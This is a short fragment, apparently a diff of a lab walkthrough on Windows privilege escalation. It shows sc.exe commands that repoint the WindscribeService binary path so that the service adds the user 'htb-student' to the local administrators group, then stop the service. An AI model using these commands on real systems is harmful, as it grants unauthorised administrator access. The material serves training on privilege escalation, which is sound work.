Skip to content

 sc.exe config WindscribeService binpath="cmd /c net localgroup administrators htb-student /add"

-Next, we must stop the service, so the new binpath command will run the next time it is started.
+Now we need to restart the service, so the new binpath command will run the next time it is started.

 sc.exe stop WindscribeService